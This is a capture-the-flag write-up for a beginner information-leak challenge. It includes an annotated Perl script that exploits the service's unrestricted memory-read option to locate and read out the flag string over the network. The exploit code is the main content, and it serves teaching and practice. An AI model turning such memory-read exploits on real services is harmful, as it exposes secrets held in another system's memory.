Rating:
Task:
Baby's first infoleak (do you even really need the binary?) (https://en.wikipedia.org/wiki/Information_leakage)
Server: 172.31.1.36:1616
Binary: 172.31.0.10/tyro_infoleak1_bdc3f08dab986b30317b0937a096d794
Approach:
The binary offered options to view the contents of a memory address, either by a relative offset or by an absolute address. In GDB we found that offset 0 was the starting address used for relative offsets and offset 4 was the address of the flag string.
A simple Perl script was written to read the flag by computing the relative offset between the two addresses and walking upwards from the flag string. The script corrupted the last two bytes of the output, but the result was trivial to correct by hand.
#!/usr/bin/perl
# Reads the flag from the remote "infoleak" service by repeatedly using its
# relative-offset memory-read option (menu option "1" followed by an offset).
# From a defender's view this shows why an unrestricted memory-read primitive
# is a complete information leak: two reads recover the layout, and the rest
# is a linear walk.
#
# Reviewer notes: there is no `use strict; use warnings;`, so $sock is an
# undeclared package global; the socket constructor and every recv() are
# unchecked, and fixed sleep(1) calls stand in for reading until a prompt, so
# a slow server can leave a reply half-read.
use IO::Socket::INET;
# Connect to the challenge server named in the write-up.  An undef return
# (connection refused, timeout) is not checked, so a later send() would die.
$sock = IO::Socket::INET->new(PeerAddr => '172.31.1.36',
PeerPort => 1616,
Proto => 'tcp');
sleep(1);
my $linebuf;
# Two reads in one write: option 1 at relative offset 0, then option 1 at
# relative offset 4.  Per the write-up these return the base address used for
# relative reads and the address of the flag string, respectively.
$sock->send("1\n0\n1\n4\n");
sleep(1);
$sock->recv($linebuf, 4096);
print $linebuf;
my $decoded = '';
# Pull the two 8-hex-digit values out of the combined reply; /s lets `.*`
# span the newline(s) between them.  This depends on the server's output
# format: the first two "0x" tokens followed by 8 non-space characters win.
if ($linebuf =~ /0x(\S\S\S\S\S\S\S\S).*0x(\S\S\S\S\S\S\S\S)/s) {
my ( $stack, $string) = ($1, $2);
# Distance from the flag string up to the relative base.  Assumed positive
# (the string lies below the base); only the printf below would reveal
# otherwise, and a negative value would make the "-%08x" formatting below
# produce a nonsensical request.
my $offset = hex($stack) - hex($string);
printf "Offset: %08x, %08x, %08x\n", hex($stack), hex($string), $offset;
my $walker = "";    # never used
# Walk 14 words (56 bytes) starting at the flag string.  Each request asks
# for relative offset -(offset - bucket), which the server resolves to
# base - offset + bucket, i.e. string + bucket.
foreach my $cur_bucket (0, 4, 8, 12, 16, 20, 24, 28, 32, 36, 40, 44, 48, 52) {
my $current = sprintf("1\n-%08x\n", ($offset - $cur_bucket));
print "Sending offset: $cur_bucket\n";
$sock->send($current);
sleep(1);
$sock->recv($linebuf, 4096);
print "$linebuf";
# Capture 2 to 8 hex digits after "0x".  NOTE(review): an odd-length capture
# leaves the final nibble unpaired in the (..) loop below; presumably this is
# where the corrupted trailing bytes mentioned in the write-up come from,
# though that is not verified here.
if ($linebuf =~ /0x(\S\S\S?\S?\S?\S?\S?\S?)/) {
my $val = $1;
my $temp = '';
# Turn each hex byte pair into its character ...
while ($val =~ /(..)/g) { $temp .= chr(hex($1))}
# ... then reverse the bytes, because the word is printed most-significant
# byte first while the string bytes are wanted in ascending address order
# (implies a little-endian target; assumed, not shown by this code).
$decoded .= reverse($temp);
}
}
}
print "Decoded: $decoded\n";